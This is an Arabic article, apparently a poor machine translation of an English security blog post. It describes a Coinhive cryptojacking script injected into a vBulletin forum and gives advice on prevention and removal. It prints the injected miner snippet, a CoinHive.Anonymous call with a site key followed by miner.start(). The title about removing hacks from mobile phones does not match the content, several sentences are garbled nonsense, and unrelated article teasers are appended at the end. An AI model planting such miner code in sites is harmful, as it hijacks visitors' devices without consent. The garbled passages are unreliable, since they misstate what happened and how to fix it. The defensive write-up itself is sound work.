طريقة حذف الإختراق من الموبايل هام جدا يا بنات
جدول المحتويات:
لقد قرأت عن مالكي مواقع الويب باستخدام البرامج النصية على مواقعهم الإلكترونية التي تستخدم وحدة المعالجة المركزية لجهاز الكمبيوتر الخاص بالزائر عند زيارتهم لموقعهم على الويب. تكمن الفكرة في تحقيق الدخل من محتواها - وبدلاً من استخدام الإعلانات ، يستخدمون برنامجًا نصيًا يعمل في المتصفح ويستخدم موارد الكمبيوتر للمستخدم لإزالة العملة المكررة. لكنني كنت أعتقد أن مالكي مواقع الويب فقط هم الذين فعلوا ذلك بالتصميم - لم أتخيل أبداً أن المتطفلين سيقومون باختراق مواقع ويب ودفع البرنامج النصي إلى مواقع ويب أخرى واستخدام زائريه لوحدة المعالجة المركزية لجني المال لأنفسهم. ولكن هذا ما يبدو أنه يحدث الآن!
Coinhive crypto-mining script
بالأمس عندما زرت منتدى TWC الخاص بنا ، والذي يعمل على برنامج vBulletin ، ألقى برنامج الأمان الخاص بي هذا التحذير:
// coinhive dot com /lib/coinhive.js تم اكتشاف ملف كائن وتم تنزيله
عادة ما أزور المنتدى كل يوم ولم أراه في اليوم السابق. لذا أفترض أن هذا حدث بعض الوقت أثناء الليل ، وقتي ، عندما كنت نائما.
أستخدم برنامج vBulletin للمنتدى ، وتم تحديثه إلى أحدث إصدار. علاوة على ذلك ، كان هذا مفاجئًا جدًا بالنسبة لنا ، حيث يستخدم نطاق TheWindowsClub.com Sucuri Web Antivirus & Firewall لحماية نفسه من تهديدات الويب عبر الإنترنت.
برنامج أمان جهاز الكمبيوتر الخاص بي بنجاح أوقف البرنامج النصي الخبيث من التشغيل على جهاز الكمبيوتر الخاص بي ويندوز 10. راجعت مع متصفحات أخرى مثل Chrome & Edge ، وكانت النتائج متشابهة.
بعد النقر بزر الماوس الأيمن على صفحة منتدى الويب والتحقق من شفرة المصدر ، اكتشفت أنه برنامج نصي خبيث لـ CryptoMiner من CoinHive.
هذا هو جافا سكريبت Coinhive الضارة التي حصلت في رمز المنتدى الخاص بي:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm") ؛ miner.start () ؛
على أي حال ، كان أول شيء فعلته هو أخذ منتدى لأسفل وإبلاغ Sucuri.
نظمت Sucuri الناس منتدى سكوت Coinhive التي تم دفعها في المنتدى الخاص بي في غضون بضع ساعات ، وجميع على ما يرام.
ما هو CoinHive
تقدم Coinhive عامل تحرير جافا سكريبت لمبرد عملة مونيرو الذي يمكنك تضمينه في موقع الويب الخاص بك واستخدام وحدة المعالجة المركزية لزوار الموقع الإلكتروني لأجهزة الكمبيوتر من أجل عملات معدنية من أجلك.
وهذا ما يسمى Cryptojacking . وهي تنطوي على اختطاف متصفحات المستخدمين لتعدين cryptocurrency. قد يستخدمه بعض مالكي مواقع الويب نفسه لجني المال - ولكن في حالتنا ، فقد تم حقنه.
عندما يصل مستخدم إلى الموقع المصاب ، ينفذ جافا سكريبت من Coinfive والألغام Monero مستخدمًا موارد وحدة المعالجة المركزية للمستخدم. قد يؤدي هذا إلى اختناق وحدة المعالجة المركزية (CPU) وتحطم النظام غير المتوقع لجهاز الضحية.
الآن إذا كان متصفحك مصابًا ، سترى استخدام الموارد الخاص بك ترتفع. أغلق المتصفح ، وسيسقط. قد يلاحظ المستخدم تسخين جهازه ، أو تشغيل المروحة بسرعة أو استنزاف البطارية بسرعة.
لقد طلبت من زميلي سوراب موكخار زيارة المنتدى الخاص بي باستخدام Mac وانظر ماذا حدث. حسنا ، كان جهاز الكمبيوتر الخاص به ماك يتأثر أيضا عندما فتح المنتدى مع سفاري! وهو واحد من هؤلاء المستخدمين الذكية لنظام التشغيل Mac OSX الذي يستخدم برنامج مكافحة الفيروسات لجهاز Mac الخاص به. أوقف فيروس Avast الخاص به لـ Mac بنجاح البرنامج النصي الخبيث من تشغيله.
Said Saurabh،
البرمجيات الخبيثة التي تستخدمها CoinHive لا تقوم فقط باختطاف جهاز كمبيوتر يعمل بنظام Windows ولكن أيضا جهاز Mac أيضًا ، نظرًا لارتباطه بإعداد Javascript. من الجيد أنني لا أؤمن بأسطورة أن أجهزة Mac لا تحتاج إلى برامج مكافحة الفيروسات ، وإلا كان جهازي مصابًا ، وكان جهاز Mac قد استمر في إنتاج العملات المعدنية لشخص آخر.
منع CoinHive من إصابة موقع الويب الخاص بك
- لا تستخدم أي قوالب أو إضافات NULL على موقع الويب الخاص بك / المنتدى.
- حافظ على تحديث CMS إلى الإصدار الأحدث.
- قم بتحديث برنامج الاستضافة الخاص بك بشكل منتظم (PHP ، قاعدة البيانات ، الخ …).
- تأمين موقع الويب الخاص بك مع مزودي أمن الويب مثل Sucuri ، Cloudflare ، Wordfence ، إلخ.
- اتخاذ الاحتياطات الأساسية لتأمين مدونتك.
CoinHive miner removal from website
أولاً وقبل كل شيء ، يجب أن تكون المسؤول عن الموقع موقع ويب مصاب - أو لديك بيانات اعتماد إدارية تتيح لك الوصول إلى جميع ملفات موقع الويب.
الآن عندما يكتشف برنامج مكافحة الفيروسات عدوى CoinHive ، انقر بزر الماوس الأيمن على صفحة الويب وحدد View Source Code. اضغط التالي Ctrl + F وابحث عن "CoinHive".
بمجرد تحديد موقع الشفرة الضارة ، ستحتاج إلى رؤية موقعها - أين تقع. الآن تحتاج إلى إزالته يدويا. للقيام بذلك ، تحتاج إلى القليل من المعرفة الترميز من النظام الأساسي الخاص بك. يجب تحديد موقع الملف / الملفات المصابة وإزالة البرنامج النصي أعلاه يدويًا منه. إذا لم تكن متأكدًا من ذلك ، فالرجاء سؤال بعض الخبراء للقيام بذلك. بما أننا نستخدم Sucuri ، فإننا ندعهم يفعلون ذلك.
بعد القيام بذلك ، قم بمسح ذاكرة التخزين المؤقت للخادم والمستعرض. إذا كنت تستخدم أي مكون إضافي للذاكرة المؤقتة أو قل MaxCDN ، فامسح مخابئ التخزين هذه أيضًا.
احمِ نفسك ضد نصوص التعدين المشفرة
تقنية Cryptocurrencies & Blockchain تستولي على العالم. إنها تخلق تأثيرًا على الاقتصاد العالمي وتتسبب أيضًا في اضطرابات التكنولوجيا. بدأ الجميع التركيز على مثل هذه السوق المربحة - وهذا يشمل قراصنة الإنترنت أيضا. ومع زيادة العوائد ، ينبغي أن نتوقع إساءة استخدام هذه التكنولوجيات. هذا هو الجانب المظلم من أي تكنولوجيا ناشئة.
ما يمكننا القيام به هو اتخاذ أفضل الاحتياطات الممكنة في جميع الأوقات. بصرف النظر عن استخدام برنامج أمان جيد ، استخدم ملحق Chrome أو Firefox الذي يحظر مواقع الويب من استخدام وحدة المعالجة المركزية الخاصة بك لإزالة Cryptocurrency - أو الأفضل من ذلك ، استخدم Anti-WebMiner الذي سيوقف هجمات Script Cryptojacking Mining بتعديل ملف Hosts الخاص بك. يعمل على جميع المتصفحات. إذا كنت من مستخدمي Mac ، فيرجى الحصول على برنامج مكافحة فيروسات للكمبيوتر الخاص بك أيضًا.
كمسألة احترازية وفيرة ، إذا شعرت أنك قد زرت موقعًا مصابًا ، فستكون لديك فكرة جيدة في مسح المتصفح قم بتخزين ذاكرة جهازك ومسحها ضوئيًا باستخدام برنامج مكافحة الفيروسات بالإضافة إلى AdwCleaner.
كن آمناً ، ابقَ على أهبة الاستعداد!
يحتوي على برنامج Office Softmaker منخفض التكلفة يتضمن البرنامج النصي المعتاد ، Plus BASIC
يشمل Softmaker Office البرامج الأساسية نفسها كما في Ashampoo Office 2010 ، بالإضافة إلى لغة البرمجة النصية BasicMaker.
5 طرق لاستخدام معدل الارتداد لتحسين موقعك على الويب
هل يفر الزوار من موقعك على الويب فور وصولهم إلى هناك؟ هناك الكثير الذي يمكنك فعله لتغيير ذلك. إليك كيفية البدء.
تعمل Google على تحسين الأمان لعمليات بحث موقعك على الويب
نفذت Google بشكل كامل ميزة أمان تضمن أن الشخص الذي يبحث عن موقع ويب ليس عن غير قصد توجه إلى واحد مزيف.